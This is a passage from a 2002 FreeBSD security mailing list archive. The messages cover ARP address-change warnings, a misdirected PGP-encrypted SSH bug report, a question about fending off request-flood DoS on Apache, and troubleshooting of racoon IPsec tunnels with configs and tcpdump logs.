From owner-freebsd-security Sun Jul 28 13:24:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 831FD37B400 for ; Sun, 28 Jul 2002 13:24:38 -0700 (PDT) Received: from sccrmhc02.attbi.com (sccrmhc02.attbi.com [204.127.202.62]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8EEDA43E3B for ; Sun, 28 Jul 2002 13:24:32 -0700 (PDT) (envelope-from craig@millerfam.net) Received: from Desktop ([12.236.220.188]) by sccrmhc02.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP id <20020728202431.CRZO1451.sccrmhc02.attbi.com@Desktop>; Sun, 28 Jul 2002 20:24:31 +0000 Message-ID: <002001c23674$adb8a260$fe01a8c0@Desktop> From: "Craig Miller" To: "Duncan Patton a Campbell is Dhu" , "faSty" Cc: References: <006301c22e83$2b3d5b30$fe01a8c0@Desktop> <20020718204203.GA71330@i-sphere.com> <20020718204840.M67510@babayaga.neotext.ca> Subject: Re: wierdness in my security report Date: Sun, 28 Jul 2002 13:23:47 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org That is correct, they are not my MAC addresses. Also, based on the mac address it is Cisco hardware further pointing toward AT&Ts hardware since my FreeBSD box definately is not made by Cisco. --Craig ----- Original Message ----- From: "Duncan Patton a Campbell is Dhu" To: "faSty" ; "Craig Miller" Cc: Sent: Thursday, July 18, 2002 1:48 PM Subject: Re: wierdness in my security report > This I've seen too, but he sez the mac's aren't his.... > > Duncan Patton a Campbell is Duibh ;-) > > ---------- Original Message ----------- > From: faSty > To: Craig Miller > Sent: Thu, 18 Jul 2002 13:42:03 -0700 > Subject: Re: wierdness in my security report > > > DO you have bridge on your server? > > > > I have that same similar and the bridge 2 ethernet > > port fight over who master the primary IP address. > > > > -fasty > > > > On Thu, Jul 18, 2002 at 10:47:21AM -0700, Craig Miller > > wrote: > > > Anyone have any ideas as to what might be causing the > following to appear in my security report? > > > > > > arp: 12.236.220.1 moved from 00:b0:64:b7:6f:54 to > 00:b0:64:b7:6f:a8 on dc0 > > > > Jul 17 05:47:56 server /kernel: arp: 12.236.220.1 moved > from 00:b0:64:b7:6f:54 to 00:b0:64:b7:6f:a8 on dc0 > > > > arp: 12.236.220.1 moved from 00:b0:64:b7:6f:a8 to > 00:b0:64:b7:6f:54 on dc0 > > > > Jul 17 05:47:57 server /kernel: arp: 12.236.220.1 moved > from 00:b0:64:b7:6f:a8 to 00:b0:64:b7:6f:54 on dc0 > > > > > > I thought those : delimited fields would be MAC addresses, > but they don't match the MAC addresses of either of the two > cards in my free-bsd box. I have not checked the MAC addresses > of the other network cards on my network. > > > > > > Also, where does the "server /kernel" name come from. > "kernel" is not the name I gave my kernel, so I am suspicious. > > > > > > Thanks, > > > > > > --Craig > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the > > message > ------- End of Original Message ------- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 28 23:28: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 31C2A37B400 for ; Sun, 28 Jul 2002 23:28:03 -0700 (PDT) Received: from thor.piqnet.org (adsl-66-125-235-59.dsl.sntc01.pacbell.net [66.125.235.59]) by mx1.FreeBSD.org (Postfix) with ESMTP id 18EEB43E4A for ; Sun, 28 Jul 2002 23:28:02 -0700 (PDT) (envelope-from joelh@gnu.org) Received: from freya.pvt.piqnet.org (adsl-66-125-235-60.dsl.sntc01.pacbell.net [66.125.235.60]) (authenticated bits=128) by thor.piqnet.org (8.12.5/8.12.5) with ESMTP id g6T6RtGO032114; Sun, 28 Jul 2002 23:27:56 -0700 (PDT) (envelope-from joelh@gnu.org) Received: from freya.pvt.piqnet.org (localhost [127.0.0.1]) by freya.pvt.piqnet.org (8.12.5/8.12.5) with ESMTP id g6T6RoBg037405; Sun, 28 Jul 2002 23:27:50 -0700 (PDT) (envelope-from joelh@gnu.org) Received: (from joelh@localhost) by freya.pvt.piqnet.org (8.12.5/8.12.5/Submit) id g6T6RmgN037402; Sun, 28 Jul 2002 23:27:48 -0700 (PDT) X-Authentication-Warning: freya.pvt.piqnet.org: joelh set sender to joelh@gnu.org using -f To: security@freebsd.org Subject: SSH issue From: Joel Ray Holveck Date: 28 Jul 2002 23:27:46 -0700 Message-ID: <87wurfrqu5.fsf@freya.pvt.piqnet.org> Lines: 76 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.2 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="=-=-=" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=-=-= I originally sent this message a week ago, and received no response. I was having trouble with my mail config at the time, but I thought it went out okay. I would appreciate it if you could please acknowledge that you received it. As always, I would appreciate any advice you may have on this matter. You certainly have more experience than I do in security matters, so I would appreciate your advice on how to proceed. If you feel it's appropriate, I can look for the buggy code on my own, and write a patch. However, I would appreciate your insight into this issue. Thanks, joelh --=-=-= Content-Type: message/rfc822 Content-Disposition: inline Return-Path: Received: from freya.pvt.piqnet.org (freya.pvt.piqnet.org [192.168.13.8]) by thor.piqnet.org (8.12.5/8.12.3) with ESMTP id g6LNf49q041595 for ; Sun, 21 Jul 2002 16:41:04 -0700 (PDT) (envelope-from joelh@gnu.org) Received: from freya.pvt.piqnet.org (localhost [127.0.0.1]) by freya.pvt.piqnet.org (8.12.3/8.12.3) with ESMTP id g6LNerx1025502; Sun, 21 Jul 2002 16:40:53 -0700 (PDT) (envelope-from joelh@gnu.org) Received: (from joelh@localhost) by freya.pvt.piqnet.org (8.12.3/8.12.3/Submit) id g6LNerkE025499; Sun, 21 Jul 2002 16:40:53 -0700 (PDT) X-Authentication-Warning: freya.pvt.piqnet.org: joelh set sender to joelh@gnu.org using -f Sender: joelh@freya.pvt.piqnet.org To: security-officer@freebsd.org Subject: SSH issue From: Joel Ray Holveck Precedence: first-class Date: 21 Jul 2002 16:40:53 -0700 Message-ID: <8765z87ipm.fsf@freya.pvt.piqnet.org> Lines: 34 X-Spam-Status: No, hits=3.7 required=5.0 tests=X_AUTH_WARNING,UPPERCASE_50_75,AWL version=2.30 X-Spam-Level: *** MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii -----BEGIN PGP MESSAGE----- Version: GnuPG v1.0.7 (FreeBSD) hIwDVS4eLnPSiKUBBACe9X9i7XHexcM61pNUxBbPHHRs3/7+oFzH4bSBRRY31XcR IR3vSvf3trWJNnXb7pF5PoJIFOFif4rrnJBjErmeBbtE11wwa5phtsZttb7hanUH 96zaNxCKK7lSNzfOLNHiyRYKvkgUdg4+ou2A8Za2GE0upi3/q0uz4igXYFVqrYUC DgO7y92/FY6jdxAH/2CM5VRsW7E5EQFb0omjjSWIHGH2nerX1W7P+Gmzl0dW/xft u5PVbHHQWzVfHWSzqhSk4hzw/0sEpToMOVjbfiMvWVLgvvX6tk4i0E7Xldfwv+DV fxWzcUwWRzKde0FvVwPW6jGPRYJDKR30b/nYfit7cF/hc7okZk+wdC6pDLAiHmNS oPexWxa0IWFQMnt7WNMUHX+v1DfOHoICYCfRvLq5uiAYk2ZXOdrdYnqr4IXmk+7+ XxWdGVp/iP45DzjIg91xocuHYA/TOROKnhxy/O+IJMQbD6WdvfUjkTIRFwMcVn1Z dgF2r1zRaG/75XvQwjPnTBaN3XkW/IRs0/BUWeIIAIVtjtyVMfKDE1EU7pTsghmM iQzmJ4qcjZL3TAXJ++9n4RuIWwlN4h6d5FIGr9ySISu1o5KDDQgTgSiqSdrueJ5F eCK0BQLEpJRIW6zAWHbmASF1ujhc+7sTIPCnBi6tGPElcaY3hXCqquduo+Zh1zik oSXSUnThpBD1c3hBwHX3EMm2WdOY4FtTSojNlH3W1mETw6u2oAkBkc/PDQRGoAfE evKMssTDcRIGwehwiCiSVSTDkH4gqO1557Q4jYxNTm9jmVnx9jTbvxGbKFXCMIPe 1inTl6hInRMmmRFCAr+QywPqkGee8f2ZF8HPzTRRom3+lOk78ctmgNjPubXiEk7J 6a6MOmSdQ7sZPBsMDqJcUy1BCjnVAbqpa84k86wOFSwPWVbc4f1zVcbf241tKxyW xvTcpwkjPg2J/NBPY2tmucm/8mss6WCEawDMknWm7Vqb1Eo8sF0Z2fASV/8vJzL9 0cc/0cQs+aWF03UihHhjr8YniCWWvv2oZIpFyBNRw6/MsAKspdnYUY7JURZ65DPX IBoRMZHnEUOhBUYU80ZyvvW+48c50+HRAwIl1pC0FKNZ76XIm6sb9F4d3JKEL3VY MRXmcsWETVVKmS9ubUIaZNCNg1REiOh+n3n/Pq8if9kOODQo/tVbmePHwlbwIGoD mvxx/GjrC0Z3NKapQQaX8Pnse6gcsIiYxgRI7+Gmw9I4TE3h0UTBgag6Uep4C2R7 EOIct3Ar5cGwNx7Tq2K1jGkoQ0rcPd3z7CykR55GkcXVaU2Y9iGO/Ubticw7LlNo WL5XyDl/KF2kLLhQ5WzIMvkldfNZYm3mebr4vSMTfUHYFRvUMMciSrVs1TMNoYBI NHKvNXUCRdesKRu5p0NHoqaC1SFomwpmBfMBg8alWM82IaxPJITVhy7cbdLj8q8G yl84RjUvXp0x3sYus/DeZob9uQfZZLOkj/fcD2xwkSvKE2xghwk3FiDa9Zn5Hdq2 cr61vxmxMvqCddqG+ludxn31I4t+VFMXObHALdAegCDxpnH9iBCcgWKTe1DAh1HL q24tX6y03vDRdiWE6qj99LH4pvJyTXfnuPiB+PQh4M5AE1ZfUZDryKQ0pHkkDI9G atF90QOgcxHgPm8p//GD8A+X6fe3ZI7tcna09uN1CD1vTJMR4qZgIsG1D3WdIrWE RnNXyYE7ROO/cUG220bN8mAEdjZJLMSyrnky69/tevVLRpjAoY1BCQM8gAABDz2Q K8q2jULab5Y= =NE54 -----END PGP MESSAGE----- --=-=-=-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 0: 0:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C0E6937B400 for ; Mon, 29 Jul 2002 00:00:49 -0700 (PDT) Received: from thor.piqnet.org (adsl-66-125-235-59.dsl.sntc01.pacbell.net [66.125.235.59]) by mx1.FreeBSD.org (Postfix) with ESMTP id 16A7C43E65 for ; Mon, 29 Jul 2002 00:00:49 -0700 (PDT) (envelope-from joelh@gnu.org) Received: from freya.pvt.piqnet.org (adsl-66-125-235-60.dsl.sntc01.pacbell.net [66.125.235.60]) (authenticated bits=128) by thor.piqnet.org (8.12.5/8.12.5) with ESMTP id g6T70lGO032402; Mon, 29 Jul 2002 00:00:47 -0700 (PDT) (envelope-from joelh@gnu.org) Received: from freya.pvt.piqnet.org (localhost [127.0.0.1]) by freya.pvt.piqnet.org (8.12.5/8.12.5) with ESMTP id g6T70gBg037496; Mon, 29 Jul 2002 00:00:42 -0700 (PDT) (envelope-from joelh@gnu.org) Received: (from joelh@localhost) by freya.pvt.piqnet.org (8.12.5/8.12.5/Submit) id g6T70gLL037493; Mon, 29 Jul 2002 00:00:42 -0700 (PDT) X-Authentication-Warning: freya.pvt.piqnet.org: joelh set sender to joelh@gnu.org using -f To: security@freebsd.org Subject: Re: SSH issue References: <87wurfrqu5.fsf@freya.pvt.piqnet.org> From: Joel Ray Holveck Date: 29 Jul 2002 00:00:42 -0700 In-Reply-To: <87wurfrqu5.fsf@freya.pvt.piqnet.org> Message-ID: <87sn23rpb9.fsf@freya.pvt.piqnet.org> Lines: 14 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org After I sent my last message a few minutes ago, I got an email from saying that my email had been "quarantined" because it contained a PGP-encrypted section. After I stopped laughing, I figured I should let whoever didn't get my last message know what happened. The antivirus@ message didn't say who the recipient at that point was; it only listed security-officer@freebsd.org. Anyway, whoever was being so steadfastly protected from the terror of secure communication, you can get my message at http://www.piqnet.org/ssh-message.txt Cheers, joelh To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 1:56:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 80F1637B400 for ; Mon, 29 Jul 2002 01:56:33 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 19E3443E3B for ; Mon, 29 Jul 2002 01:56:33 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 02D76535C; Mon, 29 Jul 2002 10:56:30 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Joel Ray Holveck Cc: security@freebsd.org Subject: Re: SSH issue References: <87wurfrqu5.fsf@freya.pvt.piqnet.org> From: Dag-Erling Smorgrav Date: 29 Jul 2002 10:56:30 +0200 In-Reply-To: <87wurfrqu5.fsf@freya.pvt.piqnet.org> Message-ID: Lines: 7 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Why are you sending this to security@freebsd.org, which is an open mailing list, if you don't want it read by anyone but the security officer? DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 2: 4:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4AD2F37B400 for ; Mon, 29 Jul 2002 02:04:33 -0700 (PDT) Received: from odsource.com (12-220-120-77.client.insightBB.com [12.220.120.77]) by mx1.FreeBSD.org (Postfix) with ESMTP id A54C043E31 for ; Mon, 29 Jul 2002 02:04:32 -0700 (PDT) (envelope-from cyrus@odsource.com) Received: from odsource.com (localhost.odsource.com [127.0.0.1]) by odsource.com (8.12.5/8.11.6) with ESMTP id g6T94PcM047624 for ; Mon, 29 Jul 2002 05:04:26 -0400 (EDT) (envelope-from cyrus@odsource.com) Received: from localhost (cyrus@localhost) by odsource.com (8.12.5/8.12.5/Submit) with ESMTP id g6T94O7s047621 for ; Mon, 29 Jul 2002 05:04:25 -0400 (EDT) (envelope-from cyrus@odsource.com) Date: Mon, 29 Jul 2002 05:04:24 -0400 (EDT) From: Cyrus To: security@freebsd.org Subject: counter apache DoS attacks? Message-ID: <20020729050402.Q47608-100000@odsource.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Several people get their jollies off by having differnet servers infinitely request my main page thousands of times each therefore shooting my memory to poo and a lot of bandwidth. But my problem is the memory, not the bandwidth. I've looked through mod_throttle and such, not for me. Is there anything out there that can automatically detect and take an action for this type of attack? I dunno...like use route on the offenders IP and such. But for it to do this automatically. Anyone have any suggestions? Thanks in advance. -Cyrus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 2: 7: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EDCB537B400 for ; Mon, 29 Jul 2002 02:07:00 -0700 (PDT) Received: from thor.piqnet.org (adsl-66-125-235-59.dsl.sntc01.pacbell.net [66.125.235.59]) by mx1.FreeBSD.org (Postfix) with ESMTP id 11FDD43E67 for ; Mon, 29 Jul 2002 02:07:00 -0700 (PDT) (envelope-from joelh@gnu.org) Received: from thor.piqnet.org (joelh@localhost [127.0.0.1]) by thor.piqnet.org (8.12.5/8.12.5) with ESMTP id g6T96wGN032787; Mon, 29 Jul 2002 02:06:58 -0700 (PDT) (envelope-from joelh@gnu.org) Received: (from joelh@localhost) by thor.piqnet.org (8.12.5/8.12.5/Submit) id g6T96vO8032784; Mon, 29 Jul 2002 02:06:57 -0700 (PDT) X-Authentication-Warning: thor.piqnet.org: joelh set sender to joelh@gnu.org using -f To: Dag-Erling Smorgrav Cc: security@freebsd.org Subject: Re: SSH issue References: <87wurfrqu5.fsf@freya.pvt.piqnet.org> From: Joel Ray Holveck Date: 29 Jul 2002 02:06:56 -0700 In-Reply-To: Message-ID: <8765yykimn.fsf@thor.piqnet.org> Lines: 16 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.1 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Why are you sending this to security@freebsd.org, which is an open > mailing list, if you don't want it read by anyone but the security > officer? Oops. Wrong address. Apologies all around, joelh [goes off and looks sheepish somewhere else] -- Joel Ray Holveck - joelh@gnu.org Fourth law of programming: Anything that can go wrong wi sendmail: segmentation violation - core dumped To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 7:45:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0B97337B400 for ; Mon, 29 Jul 2002 07:45:37 -0700 (PDT) Received: from trish.dyn.magenet.com (bgp01560565bgs.gambrl01.md.comcast.net [68.50.32.109]) by mx1.FreeBSD.org (Postfix) with ESMTP id AF1E843E42 for ; Mon, 29 Jul 2002 07:45:35 -0700 (PDT) (envelope-from trish@egobsd.org) Received: from trish.dyn.magenet.com (trish@localhost [127.0.0.1]) by trish.dyn.magenet.com (8.12.5/8.12.1) with ESMTP id g6TEkU9D008190; Mon, 29 Jul 2002 10:46:31 -0400 (EDT) Received: from localhost (trish@localhost) by trish.dyn.magenet.com (8.12.5/8.12.5/Submit) with ESMTP id g6TEkU0N008187; Mon, 29 Jul 2002 10:46:30 -0400 (EDT) X-Authentication-Warning: trish.dyn.magenet.com: trish owned process doing -bs Date: Mon, 29 Jul 2002 10:46:30 -0400 (EDT) From: Trish Lynch X-X-Sender: To: Subject: racoon and weirdness.... Message-ID: <20020729103029.R484-100000@trish.dyn.magenet.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm working on setting up IPSEC tunnels between a KAME/racoon/FreeBSD-STABLE box and a Ravlin unit at a client's WHat is happening with the one tunnel is this: after a couple days, it times out, and neither side can reestablish traffic between, the log in /var/log/daemon for racoon tells me the tunnel *is* established, but I can;t ping through it. If I restart racoon, it all starts working fine again. The second issue is a second machine, with a cut/pasted config into racoon.conf, with simply the endpoints changed, does not work at all. I can ping the external interface of the Ravlin, but it doesn;t even *begin* phase 1. Here is the racoon.conf: remote ravlin-ext-ip [500] { exchange_mode main,aggressive; my_identifier address my-ext-ip; peers_identifier address ravlin-ext-ip; generate_policy on; nonce_size 16; lifetime time 3 hour; # sec,min,hour proposal { encryption_algorithm 3des; hash_algorithm md5; authentication_method pre_shared_key ; dh_group 1 ; } } remote ravlin-int-ip [500] { exchange_mode main,aggressive; my_identifier address my-int-ip; peers_identifier address ravlin-int-ip; generate_policy on; nonce_size 16; lifetime time 3 hour; # sec,min,hour proposal { encryption_algorithm 3des; hash_algorithm sha1; authentication_method pre_shared_key ; dh_group 2 ; } } sainfo address my-ext-ip/32[0] any address ravlin-ext-ip/32[0] any { # pfs_group 2; lifetime time 10800 sec; encryption_algorithm 3des ; authentication_algorithm hmac_md5,hmac_sha1; compression_algorithm deflate ; } sainfo address my-int-net/23[0] any address ravlin-int-net/24[0] any { # pfs_group 2; lifetime time 10800 sec; encryption_algorithm 3des ; authentication_algorithm hmac_md5,hmac_sha1; compression_algorithm deflate ; } the gif interface is set up as such: BSD2 == my machine BSD5 == Ravlin $IFCONFIG $GIF3 plumb $IFCONFIG $GIF3 mtu 1500 $IFCONFIG $GIF3 inet $BSD2_IP $BSD5_IP netmask $NETMASK /usr/sbin/setkey -FP /usr/sbin/setkey -F /usr/sbin/setkey -c << EOF spdadd $BSD2_PUB_NET $BSD5_PUB_NET any -P out ipsec esp/tunnel/${BSD2_PUB_IP}-${BSD5_PUB_IP}/require; spdadd $BSD5_PUB_NET $BSD2_PUB_NET any -P in ipsec esp/tunnel/${BSD5_PUB_IP}-${BSD2_PUB_IP}/require; EOF Anyone wanna hit me with a cluebat? -Trish -- Trish Lynch trish@egobsd.org Ecartis Core Team Key fingerprint = B04E 67CA 3A12 9930 E91C 7730 4606 3618 B74A 2493 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 9:35:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AC2B737B400; Mon, 29 Jul 2002 09:35:04 -0700 (PDT) Received: from mail.seton.org (ftp.seton.org [207.193.126.172]) by mx1.FreeBSD.org (Postfix) with ESMTP id 23AE643E3B; Mon, 29 Jul 2002 09:35:04 -0700 (PDT) (envelope-from mgrooms@seton.org) Received: from aus-gwia.aus.dcnhs.org (aus-gwia.aus.dcnhs.org [10.20.10.211]) by mail.seton.org (Postfix) with ESMTP id A87E6D0086; Mon, 29 Jul 2002 11:35:00 -0500 (CDT) Received: from AUS_SETON-MTA by aus-gwia.aus.dcnhs.org with Novell_GroupWise; Mon, 29 Jul 2002 11:34:59 -0500 Message-Id: X-Mailer: Novell GroupWise Internet Agent 6.0.1 Date: Mon, 29 Jul 2002 11:34:47 -0500 From: "Matthew Grooms" To: , Subject: Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ... Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dru, I did some checking this morning with tcpdump ( as you suggested ) and here is the info. When the ipsec session is initiated from the inside of my home network ( freebsd->vpn1 ), nothing happens. I assume since the vpn1 box does not even find this traffic interesting. Here is the log output from the respective endpoints. FreeBSD side ... tcpdump: listening on ed0 11:47:42.628327 66.90.146.202 > 65.118.63.252: 10.22.200.1.500 > 10.21.2.253.500: isakmp: phase 1 I ident: [|sa] (ipip) 11:48:02.818812 66.90.146.202 > 65.118.63.252: 10.22.200.1.500 > 10.21.2.253.500: isakmp: phase 1 I ident: [|sa] (ipip) 11:48:22.109505 66.90.146.202 > 65.118.63.252: 10.22.200.1.500 > 10.21.2.253.500: isakmp: phase 1 I ident: [|sa] (ipip) 11:48:42.119398 66.90.146.202 > 65.118.63.252: 10.22.200.1.500 > 10.21.2.253.500: isakmp: phase 1 I ident: [|sa] (ipip) 11:49:02.130134 66.90.146.202 > 65.118.63.252: 10.22.200.1.500 > 10.21.2.253.500: isakmp: phase 1 I ident: [|sa] (ipip) 11:49:22.150308 66.90.146.202 > 65.118.63.252: 10.22.200.1.500 > 10.21.2.253.500: isakmp: phase 1 I ident: [|sa] (ipip) ^C 340 packets received by filter 0 packets dropped by kernel Linux / VPN1 side ... tcpdump: listening on eth0 11:23:35.854538 66.90.146.202 > 65.118.63.252: 10.22.200.1.isakmp > 10.21.2.253.isakmp: isakmp: phase 1 I ident: [|sa] (ipip) 11:23:35.855482 65.118.63.252 > 66.90.146.202: icmp: 65.118.63.252 protocol 4 unreachable [tos 0xc0] 11:23:56.020501 66.90.146.202 > 65.118.63.252: 10.22.200.1.isakmp > 10.21.2.253.isakmp: isakmp: phase 1 I ident: [|sa] (ipip) 11:23:56.020576 65.118.63.252 > 66.90.146.202: icmp: 65.118.63.252 protocol 4 unreachable [tos 0xc0] 11:24:15.307853 66.90.146.202 > 65.118.63.252: 10.22.200.1.isakmp > 10.21.2.253.isakmp: isakmp: phase 1 I ident: [|sa] (ipip) 11:24:15.307931 65.118.63.252 > 66.90.146.202: icmp: 65.118.63.252 protocol 4 unreachable [tos 0xc0] 11:24:35.361459 66.90.146.202 > 65.118.63.252: 10.22.200.1.isakmp > 10.21.2.253.isakmp: isakmp: phase 1 I ident: [|sa] (ipip) 11:24:35.361542 65.118.63.252 > 66.90.146.202: icmp: 65.118.63.252 protocol 4 unreachable [tos 0xc0] 11:24:55.376960 66.90.146.202 > 65.118.63.252: 10.22.200.1.isakmp > 10.21.2.253.isakmp: isakmp: phase 1 I ident: [|sa] (ipip) 11:24:55.377046 65.118.63.252 > 66.90.146.202: icmp: 65.118.63.252 protocol 4 unreachable [tos 0xc0] 11:25:15.357907 66.90.146.202 > 65.118.63.252: 10.22.200.1.isakmp > 10.21.2.253.isakmp: isakmp: phase 1 I ident: [|sa] (ipip) 11:25:15.357962 65.118.63.252 > 66.90.146.202: icmp: 65.118.63.252 protocol 4 unreachable [tos 0xc0] 1073807371 packets received by filter 1 packets dropped by kernel The really interesting part for me is when the ipsec session is initiated by the vpn1 side. Racoon accepts the traffic and responds. Here is the log output from the respective sides for this scenario. FreeBSD side ... tcpdump: listening on ed0 11:53:29.269204 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 1 I agg: [|sa] (DF) 11:53:29.381550 66.90.146.202.500 > 65.118.63.252.500: isakmp: phase 1 R agg: [|sa] 11:53:29.462243 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 1 I agg: (hash: len=16) (DF) 11:53:29.575229 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 1 I agg: (hash: len=16) (DF) 11:53:29.670112 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 1 I agg: (hash: len=16) (DF) 11:53:30.001215 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 11:53:32.001928 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 11:53:34.002585 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) ^C 60 packets received by filter 0 packets dropped by kernel Linux / VPN1 side ... tcpdump: listening on eth0 11:29:22.374083 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: [|sa] (DF) 11:29:22.551798 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 1 R agg: [|sa] 11:29:22.569977 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: (hash: len=16) (DF) 11:29:22.677674 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: (hash: len=16) (DF) 11:29:22.777666 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: (hash: len=16) (DF) 11:29:23.106051 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 11:29:25.107675 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 11:29:27.107672 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) Here is my racoon.conf file ... # $KAME: racoon.conf.in,v 1.18 2001/08/16 06:33:40 itojun Exp $ path pre_shared_key "/usr/local/etc/racoon/psk.txt" ; path certificate "/usr/local/etc/cert" ; log debug2; # "padding" defines some parameter of padding. You should not touch these. padding { maximum_length 20; # maximum padding length. randomize off; # enable randomize length. strict_check off; # enable strict check. exclusive_tail off; # extract last one octet. } # if no listen directive is specified, racoon will listen to all # available interface addresses. listen { #isakmp ::1 [7000]; #admin [7002]; # administrative's port by kmpstat. #strict_address; # required all addresses must be bound. } # Specification of default various timer. timer { # These value can be changed per remote node. counter 5; # maximum trying count to send. interval 20 sec; # maximum interval to resend. persend 1; # the number of packets per a send. # 